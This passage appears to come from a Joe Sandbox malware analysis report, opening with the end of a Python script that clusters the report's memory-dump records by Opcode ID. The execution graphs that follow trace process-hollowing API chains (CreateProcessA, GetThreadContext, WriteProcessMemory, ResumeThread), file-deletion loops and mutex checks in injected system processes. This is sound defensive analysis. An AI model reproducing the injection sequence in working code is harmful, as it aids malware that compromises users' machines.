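• Instruction ID: 23dfea852a366a571cc3348c698cc6744426d11f639f151413aad9b7f5eb2e10
• Source File: 00000005.00000002.2967861512.0000000000910000.00000040.00000001.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
• Snapshot File: hcaresult_5_2_910000_svchost.jbxd
• API ID: ExitSleepThreadUser
• Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction ID: 0bb578ed6cec17c8f136f477abcb2608ff25218c2125ec3b643453ee16afebde
"""


def parse_records(text):
    """One dict per record; a record starts at each '• Source File:' line."""
    records, cur = [], None
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, val = m.group(1).strip(), m.group(2).strip()
        if key == "Source File":
            cur = {}
            records.append(cur)
        if cur is not None:
            cur[key] = val
    return records


def region_of(rec):
    """(process index, image name, region base) parsed from the snapshot name."""
    m = SNAPSHOT_RE.search(rec.get("Snapshot File", ""))
    if not m:
        return None
    return int(m.group(1)), m.group(4), int(m.group(3), 16)


def offset_consistent(rec):
    """The base taken from the snapshot name must equal the printed Offset."""
    m = OFFSET_RE.search(rec.get("Source File", ""))
    where = region_of(rec)
    return bool(m and where) and int(m.group(1), 16) == where[2]


def cluster_by_opcode(records):
    clusters = defaultdict(list)
    for rec in records:
        where = region_of(rec)
        if where and rec.get("Opcode ID"):
            clusters[rec["Opcode ID"]].append(
                {"where": where, "api_id": rec.get("API ID"),
                 "instruction_id": rec.get("Instruction ID")})
    return dict(clusters)


def shared_across_processes(records):
    """Opcode IDs found in more than one process, with where they were seen."""
    out = {}
    for opcode_id, hits in cluster_by_opcode(records).items():
        processes = sorted({h["where"][0] for h in hits})
        if len(processes) < 2:
            continue
        out[opcode_id] = {
            "processes": processes,
            "images": sorted({h["where"][1] for h in hits}),
            "bases": sorted(h["where"][2] for h in hits),
            "api_ids": sorted({h["api_id"] for h in hits}),
            "distinct_instruction_ids": len({h["instruction_id"] for h in hits}),
        }
    return out


if __name__ == "__main__":
    recs = parse_records(SAMPLE_RECORDS)
    for opcode_id, info in shared_across_processes(recs).items():
        print(opcode_id[:16], info["images"], [hex(b) for b in info["bases"]],
              info["api_ids"], "instruction ids:", info["distinct_instruction_ids"])
```

Grouping on Opcode ID rather than Instruction ID is deliberate: the Instruction ID changes with every relocation of the same code (four different values for the four regions above), while the Opcode ID stays put, which is what makes it usable as a cross-process key.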

                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:4.9%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                          Total number of Nodes:69
                                                                                                                                                                          Total number of Limit Nodes:4

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000006.00000002.2965568400.00000000009A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_9a0000_svchost.jbxd
Similarity
• API ID: ExitSleepThreadUser
• String ID:
• API String ID: 3375650085-0
• Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction ID: 87a61ee7780fe3dd6be775b2a921c89204c80ea1769b2b74f3f30dd65b7be30b
• Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction Fuzzy Hash: DB31E6724102046FEB017B749D4ABBA7BACEF92310F000165BD85DA0A6EA7549648AFA
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 8.3%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 101
Total number of Limit Nodes: 4

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000007.00000002.2966204226.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_a50000_ctfmon.jbxd
Similarity
• API ID: Virtual$Protect$Alloc
• String ID:
• API String ID: 2541858876-0
• Opcode ID: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
• Instruction ID: e5dc80538da9fb4d46b28acacc3c2bb4e555f0cc24faa64339f8904ee302d7fe
• Opcode Fuzzy Hash: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
• Instruction Fuzzy Hash: 9621D631A34C1D0BEB58A27C9859774F6E2F79C321F940295ED19D36D4ED68CC8183C6
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000007.00000002.2966204226.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_a50000_ctfmon.jbxd
Similarity
• API ID: ExitSleepThreadUser
• String ID:
• API String ID: 3375650085-0
• Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction ID: d9c953606555283b5bd9303adf5bc3df3a133a87740289e9a75d62b9567f8b42
• Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction Fuzzy Hash: D831C672410204AFEF017F709E87EBA3BACFF11312F440165FD95DA0A6EA744969CAB5
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 5.1%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 67
Total number of Limit Nodes: 5

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000008.00000002.2966201705.0000000000D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_d40000_svchost.jbxd
Similarity
• API ID: ExitSleepThreadUser
• String ID:
• API String ID: 3375650085-0
• Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction ID: 08b2109dcbf42d691bd0579a811ffb356924513e44b27f1ccfa88f3ac837c6f5
• Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction Fuzzy Hash: A631C672410244AFEB017B709D86ABA3FACEF11310F440165BE85DA0A6EA7449A5CAF5
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 4.9%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 70
Total number of Limit Nodes: 4

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000009.00000002.2968349983.0000000000B50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_b50000_StartMenuExperienceHost.jbxd
Similarity
• API ID: ExitSleepThreadUser
• String ID:
• API String ID: 3375650085-0
• Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction ID: d0a9b7ccad2424afbd224703fef996352ea6b7a6d1d9ad784538435e3ee26c62
• Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction Fuzzy Hash: 5E31D4720202046FEB017F709D86FBA3BECEF11312F0005E5BD95DA0A6EA744D69CAB5
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 7.1%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 80
Total number of Limit Nodes: 8
                                                                                                                                                                          execution_graph 2609 1108d9 2617 110cc4 2609->2617 2611 1108e5 2620 110643 2611->2620 2613 110939 2628 11093e 2613->2628 2615 1108ef 2615->2613 2616 11091f SleepEx RtlExitUserThread 2615->2616 2616->2613 2635 110c3f GetPEB 2617->2635 2619 110cc9 2619->2611 2621 110660 2620->2621 2637 11067c 2621->2637 2623 110673 2643 1106c2 2623->2643 2625 11080f 2625->2615 2626 1106b9 2626->2625 2647 110811 2626->2647 2629 110cc4 GetPEB 2628->2629 2631 11094a 2629->2631 2630 110af1 2630->2613 2631->2630 2667 1109d9 2631->2667 2634 1109d2 2634->2630 2671 110af3 2634->2671 2636 110c4b 2635->2636 2636->2619 2636->2636 2638 110681 2637->2638 2639 1106c2 7 API calls 2638->2639 2641 1106b9 2639->2641 2640 11080f 2640->2623 2641->2640 2642 110811 7 API calls 2641->2642 2642->2640 2644 1106c7 2643->2644 2645 11080f 2644->2645 2646 110811 7 API calls 2644->2646 2645->2626 2646->2645 2649 110840 2647->2649 2648 110863 2651 110866 2648->2651 2652 110cc4 GetPEB 2648->2652 2649->2648 2649->2651 2659 1108d9 2649->2659 2651->2625 2653 1108e5 2652->2653 2654 110643 5 API calls 2653->2654 2657 1108ef 2654->2657 2655 110939 2656 11093e 5 API calls 2655->2656 2656->2655 2657->2655 2658 11091f SleepEx RtlExitUserThread 2657->2658 2658->2655 2660 110cc4 GetPEB 2659->2660 2661 1108e5 2660->2661 2662 110643 5 API calls 2661->2662 2665 1108ef 2662->2665 2663 110939 2664 11093e 5 API calls 2663->2664 2664->2663 2665->2663 2666 11091f SleepEx RtlExitUserThread 2665->2666 2666->2663 2668 1109de 2667->2668 2669 110af3 7 API calls 2668->2669 2670 110af1 2668->2670 2669->2670 2670->2634 2673 110b01 2671->2673 2674 110cc4 GetPEB 2673->2674 2675 110b0d 2674->2675 2680 110b27 2675->2680 2677 110b20 2684 110b65 2677->2684 2681 110b2c 2680->2681 2682 110b65 7 API calls 2681->2682 2683 110b57 2681->2683 2682->2683 2683->2677 2688 110b6a 2684->2688 
2690 1108b3 2688->2690 2691 1108b9 2690->2691 2692 1108d9 5 API calls 2691->2692 2693 1108d5 2692->2693 2694 110cc4 GetPEB 2693->2694 2695 1108e5 2694->2695 2696 110643 5 API calls 2695->2696 2699 1108ef 2696->2699 2697 110939 2698 11093e 5 API calls 2697->2698 2698->2697 2699->2697 2700 11091f SleepEx RtlExitUserThread 2699->2700 2700->2697 2701 110b6b 2702 110b7d 2701->2702 2703 1108b3 7 API calls 2702->2703 2704 110bb1 2703->2704 2705 110c3f GetPEB 2704->2705 2706 110bb6 2705->2706

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000000A.00000002.2966275898.0000000000110000.00000040.00000001.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_110000_RuntimeBroker.jbxd
Similarity
• API ID: ExitSleepThreadUser
• String ID:
• API String ID: 3375650085-0
• Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction ID: e0c6e7e9a2d7599d1d0e12609d6689695a60be68487ad526544be4dcdcbfa815
• Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction Fuzzy Hash: 4B31D6728042047FEB0A7B709D46AFA7B6CEF15300F000175BD85DA0A2EBB449D5CBB5
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 6.3%
Dynamic/Decrypted Code Coverage: 31.4%
Signature Coverage: 0%
Total number of Nodes: 462
Total number of Limit Nodes: 5
                                                                                                                                                                          execution_graph 5761 1c495d 5762 1c4970 5761->5762 5763 1c49ae CreateEventA 5762->5763 5764 1c4a63 5762->5764 5765 1c49d1 5763->5765 5765->5764 5766 1c4d53 WaitForSingleObject 5765->5766 5766->5765 5899 1c3e9e 5900 1c3ea1 5899->5900 5903 1c3ec3 5900->5903 5904 1c3653 5903->5904 5905 1c3ec8 LoadLibraryA 5904->5905 5906 1c3eee 5905->5906 5908 1c3ed2 5905->5908 5907 1c3f0d 7 API calls 5906->5907 5911 1c3f03 5907->5911 5909 1c409a 3 API calls 5908->5909 5910 1c3ebd 5909->5910 5912 1c3f3b 5911->5912 5913 1c3f2b GetModuleHandleA 5911->5913 5915 1c3f46 Sleep 5912->5915 5914 1c401b 3 API calls 5913->5914 5916 1c3f39 5914->5916 5917 1c3f78 5915->5917 5916->5910 5918 1c3f56 Sleep 5917->5918 5919 1c3f78 5918->5919 5920 1c3f66 Sleep 5919->5920 5920->5910 5920->5916 5921 22438a7 5922 22438ac 5921->5922 5925 22438f2 5922->5925 5929 224260c 5925->5929 5930 224261a 5929->5930 5600 860000 VirtualProtect 5601 86034e 5600->5601 5602 8606d0 VirtualProtect 5601->5602 5603 860528 VirtualProtect 5601->5603 5603->5601 5931 1c3e9a 5932 1c3653 5931->5932 5933 1c3e9f GetProcAddress 5932->5933 5934 1c3eaa 5933->5934 5935 1c3ed4 5933->5935 5936 1c3ebd 5934->5936 5937 1c3ec3 12 API calls 5934->5937 5938 1c409a 3 API calls 5935->5938 5937->5936 5939 1c3ee9 5938->5939 5646 2243f2c 5647 2243f31 5646->5647 5656 2243f5d 5646->5656 5648 2243f5f 5647->5648 5649 2243f4f GetModuleHandleA 5647->5649 5651 2243f6a Sleep 5648->5651 5657 224403f 5649->5657 5652 2243f9c 5651->5652 5653 2243f7a Sleep 5652->5653 5654 2243f9c 5653->5654 5655 2243f8a Sleep 5654->5655 5655->5656 5659 2244052 5657->5659 5658 22440ba 5658->5656 5659->5658 5661 22440be 5659->5661 5666 22439d7 RtlInitializeCriticalSection 5661->5666 5665 22440c8 5665->5658 5667 22439e7 VirtualAlloc 5666->5667 5667->5667 5668 22439ff 5667->5668 5669 224382b VirtualAlloc 5668->5669 
5669->5669 5670 2243843 CreateThread 5669->5670 5670->5665 5771 2243d6a 5772 2243d6f 5771->5772 5773 22439d7 2 API calls 5772->5773 5774 2243d8a 5773->5774 5775 224382b 2 API calls 5774->5775 5776 2243d8f 5775->5776 5671 2243f31 5672 2243f36 5671->5672 5673 2243f5f 5672->5673 5674 2243f4f GetModuleHandleA 5672->5674 5677 2243f6a Sleep 5673->5677 5675 224403f 4 API calls 5674->5675 5676 2243f5d 5675->5676 5678 2243f9c 5677->5678 5679 2243f7a Sleep 5678->5679 5680 2243f9c 5679->5680 5681 2243f8a Sleep 5680->5681 5681->5676 5777 1c3d46 5778 1c3653 5777->5778 5779 1c3d4b LoadLibraryA 5778->5779 5780 1c3d61 5779->5780 5798 1c3d86 5780->5798 5783 1c3da1 5784 1c1345 3 API calls 5783->5784 5785 1c3dba 5784->5785 5786 1c1345 3 API calls 5785->5786 5787 1c3dd3 5786->5787 5788 1c1345 3 API calls 5787->5788 5789 1c3dec 5788->5789 5790 1c1345 3 API calls 5789->5790 5791 1c3e05 5790->5791 5792 1c1345 3 API calls 5791->5792 5793 1c3e1e 5792->5793 5794 1c1345 3 API calls 5793->5794 5795 1c3e37 5794->5795 5796 1c1345 3 API calls 5795->5796 5797 1c3e50 5796->5797 5799 1c3653 5798->5799 5800 1c3d8b LoadLibraryA 5799->5800 5801 1c3da1 5800->5801 5802 1c1345 3 API calls 5801->5802 5803 1c3dba 5802->5803 5804 1c1345 3 API calls 5803->5804 5805 1c3dd3 5804->5805 5806 1c1345 3 API calls 5805->5806 5807 1c3dec 5806->5807 5808 1c1345 3 API calls 5807->5808 5809 1c3e05 5808->5809 5810 1c1345 3 API calls 5809->5810 5811 1c3e1e 5810->5811 5812 1c1345 3 API calls 5811->5812 5813 1c3e37 5812->5813 5814 1c1345 3 API calls 5813->5814 5815 1c3d7e LoadLibraryA 5814->5815 5815->5783 5976 1c34c6 lstrlen 5979 1c276c 5976->5979 5978 1c34df VirtualFree CloseHandle 5980 1c277d 5979->5980 5980->5978 5981 1c31c6 5982 1c31cb 5981->5982 5983 1c31e9 lstrcat 5982->5983 5984 1c31f6 5983->5984 5985 1c321e GetStartupInfoA CreateProcessA CloseHandle CloseHandle 5984->5985 5986 1c3276 5984->5986 5985->5986 5604 1c3ec3 5605 1c3653 5604->5605 5606 1c3ec8 LoadLibraryA 5605->5606 5607 1c3eee 5606->5607 5609 1c3ed2 
5606->5609 5622 1c3f0d 5607->5622 5634 1c409a 5609->5634 5611 1c3ee9 5612 1c3f03 5613 1c3f3b 5612->5613 5614 1c3f2b GetModuleHandleA 5612->5614 5616 1c3f46 Sleep 5613->5616 5642 1c401b 5614->5642 5618 1c3f78 5616->5618 5617 1c3f39 5617->5611 5619 1c3f56 Sleep 5618->5619 5620 1c3f78 5619->5620 5621 1c3f66 Sleep 5620->5621 5621->5611 5621->5617 5623 1c3f12 5622->5623 5624 1c3f3b 5623->5624 5625 1c3f2b GetModuleHandleA 5623->5625 5627 1c3f46 Sleep 5624->5627 5626 1c401b 3 API calls 5625->5626 5628 1c3f39 5626->5628 5629 1c3f78 5627->5629 5630 1c3f76 5628->5630 5631 1c3f56 Sleep 5629->5631 5630->5612 5632 1c3f78 5631->5632 5633 1c3f66 Sleep 5632->5633 5633->5628 5633->5630 5635 1c409f 5634->5635 5636 1c1345 3 API calls 5635->5636 5637 1c40bd 5636->5637 5638 1c1345 3 API calls 5637->5638 5639 1c40d6 5638->5639 5640 1c1345 3 API calls 5639->5640 5641 1c40ef 5640->5641 5641->5611 5644 1c402e 5642->5644 5643 1c4096 5643->5617 5644->5643 5645 1c409a 3 API calls 5644->5645 5645->5643 5940 1c3883 5941 1c3888 5940->5941 5944 1c38ce 5941->5944 5943 1c3894 5948 1c25e8 5944->5948 5946 1c38e8 lstrcat 5947 1c38fe 5946->5947 5947->5943 5949 1c25f6 5948->5949 5949->5946 5309 1c093e 5330 1c0cc4 5309->5330 5311 1c094a 5333 1c14bc 5311->5333 5313 1c094f 5314 1c0954 Sleep RtlExitUserThread OpenMutexA 5313->5314 5315 1c098f GetStartupInfoA 5314->5315 5316 1c0af1 5314->5316 5348 1c09d9 5315->5348 5318 1c09d2 5319 1c0a3d DuplicateHandle 5318->5319 5322 1c0a3c 5318->5322 5327 1c09de CreateProcessA 5318->5327 5320 1c0aec 5319->5320 5321 1c0a82 WriteProcessMemory 5319->5321 5362 1c0af3 5320->5362 5321->5320 5323 1c0ab0 ResumeThread 5321->5323 5322->5319 5325 1c0ac1 Sleep OpenMutexA 5323->5325 5325->5316 5326 1c0ae7 5325->5326 5326->5320 5326->5325 5327->5320 5328 1c09ee GetThreadContext 5327->5328 5328->5320 5329 1c0a16 VirtualProtectEx 5328->5329 5329->5320 5329->5322 5364 1c0c3f GetPEB 5330->5364 5332 1c0cc9 5332->5311 5366 1c14de 5333->5366 5337 1c14d8 5380 1c1345 5337->5380 5338 1c1345 3 
API calls 5339 1c152b 5338->5339 5340 1c1345 3 API calls 5339->5340 5341 1c1544 5340->5341 5342 1c1345 3 API calls 5341->5342 5343 1c155d 5342->5343 5344 1c1345 3 API calls 5343->5344 5345 1c1576 5344->5345 5346 1c1345 3 API calls 5345->5346 5347 1c158f 5346->5347 5347->5313 5387 1c3653 5348->5387 5350 1c09de CreateProcessA 5351 1c0aec 5350->5351 5352 1c09ee GetThreadContext 5350->5352 5353 1c0af3 21 API calls 5351->5353 5352->5351 5354 1c0a16 VirtualProtectEx 5352->5354 5355 1c0af1 5353->5355 5354->5351 5356 1c0a3c DuplicateHandle 5354->5356 5355->5318 5356->5351 5358 1c0a82 WriteProcessMemory 5356->5358 5358->5351 5359 1c0ab0 ResumeThread 5358->5359 5360 1c0ac1 Sleep OpenMutexA 5359->5360 5360->5355 5361 1c0ae7 5360->5361 5361->5351 5361->5360 5389 1c0b01 5362->5389 5365 1c0c4b 5364->5365 5365->5332 5365->5365 5367 1c14e3 5366->5367 5368 1c1345 3 API calls 5367->5368 5369 1c1512 5368->5369 5370 1c1345 3 API calls 5369->5370 5371 1c152b 5370->5371 5372 1c1345 3 API calls 5371->5372 5373 1c1544 5372->5373 5374 1c1345 3 API calls 5373->5374 5375 1c155d 5374->5375 5376 1c1345 3 API calls 5375->5376 5377 1c1576 5376->5377 5378 1c1345 3 API calls 5377->5378 5379 1c158f 5378->5379 5379->5337 5381 1c1358 5380->5381 5382 1c13eb 5380->5382 5381->5382 5383 1c1364 VirtualProtect 5381->5383 5382->5338 5383->5382 5384 1c137c VirtualAlloc 5383->5384 5384->5384 5385 1c1391 5384->5385 5386 1c13ad VirtualProtect 5385->5386 5386->5382 5388 1c3665 5387->5388 5388->5350 5388->5388 5390 1c0cc4 GetPEB 5389->5390 5391 1c0b0d 5390->5391 5396 1c0b27 5391->5396 5393 1c0b20 5402 1c0b65 5393->5402 5397 1c3653 5396->5397 5398 1c0b2c LoadLibraryA 5397->5398 5399 1c0b42 5398->5399 5400 1c0b65 28 API calls 5399->5400 5401 1c0b57 5399->5401 5400->5401 5401->5393 5403 1c3653 5402->5403 5404 1c0b6a FindWindowA 5403->5404 5405 1c0bac 5404->5405 5406 1c0b74 GetWindowThreadProcessId OpenProcess 5404->5406 5413 1c08b3 5405->5413 5406->5405 5408 1c0b8e 5406->5408 5408->5405 5411 1c0ba4 ExitProcess 
5408->5411 5416 1c08b9 5413->5416 5424 1c08d9 5416->5424 5425 1c0cc4 GetPEB 5424->5425 5426 1c08e5 5425->5426 5427 1c14bc 3 API calls 5426->5427 5428 1c08ea 5427->5428 5432 1c0643 5428->5432 5431 1c08ef 5440 1c093e 5431->5440 5433 1c0660 5432->5433 5461 1c067c 5433->5461 5435 1c0673 5467 1c06c2 5435->5467 5437 1c080f 5437->5431 5438 1c06b9 5438->5437 5471 1c0811 5438->5471 5441 1c0cc4 GetPEB 5440->5441 5442 1c094a 5441->5442 5443 1c14bc 3 API calls 5442->5443 5444 1c094f 5443->5444 5445 1c0954 Sleep RtlExitUserThread OpenMutexA 5444->5445 5446 1c098f GetStartupInfoA 5445->5446 5447 1c0af1 5445->5447 5448 1c09d9 17 API calls 5446->5448 5447->5431 5449 1c09d2 5448->5449 5450 1c0a3d DuplicateHandle 5449->5450 5453 1c0a3c 5449->5453 5458 1c09de CreateProcessA 5449->5458 5451 1c0aec 5450->5451 5452 1c0a82 WriteProcessMemory 5450->5452 5455 1c0af3 17 API calls 5451->5455 5452->5451 5454 1c0ab0 ResumeThread 5452->5454 5453->5450 5456 1c0ac1 Sleep OpenMutexA 5454->5456 5455->5447 5456->5447 5457 1c0ae7 5456->5457 5457->5451 5457->5456 5458->5451 5459 1c09ee GetThreadContext 5458->5459 5459->5451 5460 1c0a16 VirtualProtectEx 5459->5460 5460->5451 5460->5453 5462 1c0681 5461->5462 5463 1c06c2 29 API calls 5462->5463 5465 1c06b9 5463->5465 5464 1c080f 5464->5435 5465->5464 5466 1c0811 29 API calls 5465->5466 5466->5464 5469 1c06c7 5467->5469 5468 1c080f 5468->5438 5469->5468 5470 1c0811 29 API calls 5469->5470 5470->5468 5472 1c0840 5471->5472 5473 1c0863 5472->5473 5474 1c08d9 29 API calls 5472->5474 5475 1c0866 5472->5475 5473->5475 5476 1c0cc4 GetPEB 5473->5476 5474->5473 5475->5437 5477 1c08e5 5476->5477 5478 1c14bc 3 API calls 5477->5478 5479 1c08ea 5478->5479 5480 1c0643 29 API calls 5479->5480 5482 1c08ef 5480->5482 5481 1c093e 29 API calls 5481->5482 5482->5481 5682 1c2f3f 5683 1c2f44 5682->5683 5684 1c2f4a lstrlen 5683->5684 5685 1c2f61 5684->5685 5483 2240000 5485 2240005 5483->5485 5500 2240ce8 5485->5500 5487 2240011 5503 22433ca 5487->5503 5489 2240016 5507 
224098b OpenMutexA 5489->5507 5492 224038f 5493 224002e 5493->5492 5494 2240697 5493->5494 5523 22406a0 5493->5523 5529 22406e6 5494->5529 5497 2240833 5498 22406dd 5498->5497 5533 2240835 5498->5533 5541 2240c63 GetPEB 5500->5541 5502 2240ced 5502->5487 5504 22433ea 5503->5504 5543 2243409 GetVolumeInformationA 5504->5543 5506 2243405 5506->5489 5508 224001b ExitProcess 5507->5508 5509 22409b3 GetStartupInfoA 5507->5509 5508->5493 5545 22409fd 5509->5545 5511 2240a60 5511->5508 5512 22409f6 5512->5511 5513 2240a02 CreateProcessA 5512->5513 5514 2240b10 5513->5514 5515 2240a12 GetThreadContext 5513->5515 5514->5508 5558 2240b17 5514->5558 5515->5514 5517 2240a3a VirtualProtectEx 5515->5517 5517->5514 5518 2240a65 DuplicateHandle 5517->5518 5518->5514 5519 2240aa6 WriteProcessMemory 5518->5519 5519->5514 5520 2240ad4 ResumeThread 5519->5520 5521 2240ae5 Sleep OpenMutexA 5520->5521 5521->5508 5522 2240b0b 5521->5522 5522->5514 5522->5521 5524 22406a5 5523->5524 5525 22406e6 3 API calls 5524->5525 5527 22406dd 5525->5527 5526 2240833 5526->5494 5527->5526 5528 2240835 3 API calls 5527->5528 5528->5526 5531 22406eb 5529->5531 5530 2240833 5530->5498 5531->5530 5532 2240835 3 API calls 5531->5532 5532->5530 5535 2240864 5533->5535 5534 224088a 5534->5497 5535->5534 5536 22408fd 3 API calls 5535->5536 5537 2240887 5535->5537 5536->5537 5537->5534 5538 2240ce8 GetPEB 5537->5538 5540 2240909 5538->5540 5539 2240962 3 API calls 5539->5540 5540->5539 5542 2240c6f 5541->5542 5542->5502 5542->5542 5544 224342b 5543->5544 5544->5506 5560 2243677 5545->5560 5547 2240a02 CreateProcessA 5548 2240b10 5547->5548 5549 2240a12 GetThreadContext 5547->5549 5550 2240b15 5548->5550 5551 2240b17 6 API calls 5548->5551 5549->5548 5552 2240a3a VirtualProtectEx 5549->5552 5550->5512 5551->5550 5552->5548 5553 2240a65 DuplicateHandle 5552->5553 5553->5548 5554 2240aa6 WriteProcessMemory 5553->5554 5554->5548 5555 2240ad4 ResumeThread 5554->5555 5556 2240ae5 Sleep OpenMutexA 5555->5556 
5556->5550 5557 2240b0b 5556->5557 5557->5548 5557->5556 5562 2240b25 5558->5562 5561 2243689 5560->5561 5561->5547 5561->5561 5563 2240ce8 GetPEB 5562->5563 5564 2240b31 5563->5564 5569 2240b4b 5564->5569 5566 2240b44 5575 2240b89 5566->5575 5570 2243677 5569->5570 5571 2240b50 LoadLibraryA 5570->5571 5572 2240b66 5571->5572 5573 2240b89 5 API calls 5572->5573 5574 2240b7b 5572->5574 5573->5574 5574->5566 5577 2240b8e 5575->5577 5576 2240bd0 5585 22408d7 5576->5585 5577->5576 5579 2240ba1 OpenProcess 5577->5579 5579->5576 5582 2240bb2 5579->5582 5582->5576 5583 2240bc8 ExitProcess 5582->5583 5588 22408dd 5585->5588 5592 22408fd 5588->5592 5593 2240ce8 GetPEB 5592->5593 5595 2240909 5593->5595 5596 2240962 5595->5596 5597 2240ce8 GetPEB 5596->5597 5598 224096e 5597->5598 5599 2240978 Sleep RtlExitUserThread 5598->5599 5956 2240b8f 5957 2240ba1 OpenProcess 5956->5957 5958 2240bd0 5957->5958 5961 2240bb2 5957->5961 5959 22408d7 3 API calls 5958->5959 5960 2240bd5 5959->5960 5962 2240c63 GetPEB 5960->5962 5961->5958 5963 2240bc8 ExitProcess 5961->5963 5964 2240bda 5962->5964 5686 1c292d 5687 1c3653 5686->5687 5688 1c2932 LoadLibraryA 5687->5688 5689 1c2948 5688->5689 5690 1c2961 VirtualAlloc 5689->5690 5690->5690 5691 1c2979 5690->5691 5709 1c29a6 5691->5709 5710 1c3653 5709->5710 5711 1c29ab lstrcat 5710->5711 5712 1c29c1 5711->5712 5726 1c29dd 5712->5726 5727 1c3653 5726->5727 5728 1c29e2 lstrcat 5727->5728 5729 1c29f8 5728->5729 5739 1c2a14 5729->5739 5740 1c3653 5739->5740 5741 1c2a19 lstrcat 5740->5741 5744 1c2a20 5741->5744 5743 1c2a8a DeleteFileA 5743->5744 5744->5743 5745 1c2ace DeleteFileA 5744->5745 5746 1c2b34 Sleep 5744->5746 5747 1c2b1e DeleteFileA 5744->5747 5748 1c2b4d 5744->5748 5745->5744 5746->5744 5747->5746 5750 1c2b5e 5748->5750 5749 1c2c41 Sleep 5749->5749 5749->5750 5750->5749 5752 1c2cf7 5750->5752 5753 1c2c99 5750->5753 5752->5744 5756 1c2b5e 5753->5756 5754 1c2cf7 5754->5750 5755 1c2c41 Sleep 5755->5755 5755->5756 5756->5753 5756->5754 
5756->5755 5891 1c0b6b GetWindowThreadProcessId OpenProcess 5892 1c0bac 5891->5892 5895 1c0b8e 5891->5895 5893 1c08b3 29 API calls 5892->5893 5894 1c0bb1 5893->5894 5896 1c0c3f GetPEB 5894->5896 5895->5892 5897 1c0ba4 ExitProcess 5895->5897 5898 1c0bb6 5896->5898 5757 1c4d25 5758 1c4d4e 5757->5758 5759 1c4d32 5757->5759 5759->5758 5760 1c4d44 SetEvent 5759->5760 5760->5758
APIs
  • Part of subcall function 0224098B: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 022409A5
  • Part of subcall function 0224098B: GetStartupInfoA.KERNEL32(00000000), ref: 022409BD
• ExitProcess.KERNEL32(00000000), ref: 0224001D
Memory Dump Source
• Source File: 0000000C.00000002.1890143342.0000000002240000.00000040.00001000.00020000.00000000.sdmp, Offset: 02240000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_2240000_bin.jbxd
Similarity
• API ID: ExitInfoMutexOpenProcessStartup
• String ID:
• API String ID: 213680645-0
• Opcode ID: 8ded0c1563596ef065c873257d9f166c149bbeaf12971adc1d4101d8be03d7fe
• Instruction ID: 5b7b2d51848ce7e6328a828d32556596b20594477a9bdb1ff08d41b4b3de3153
• Opcode Fuzzy Hash: 8ded0c1563596ef065c873257d9f166c149bbeaf12971adc1d4101d8be03d7fe
• Instruction Fuzzy Hash: 4F72E36142D3C14FD71F9BE04A64A657F79BF03208B0910CBD7829E0BBDE645B89C76A
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 0000000C.00000002.1889756937.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_860000_bin.jbxd
Similarity
• API ID: ProtectVirtual
• String ID: $1;$@$C[$R$d:$wJ$y7$v
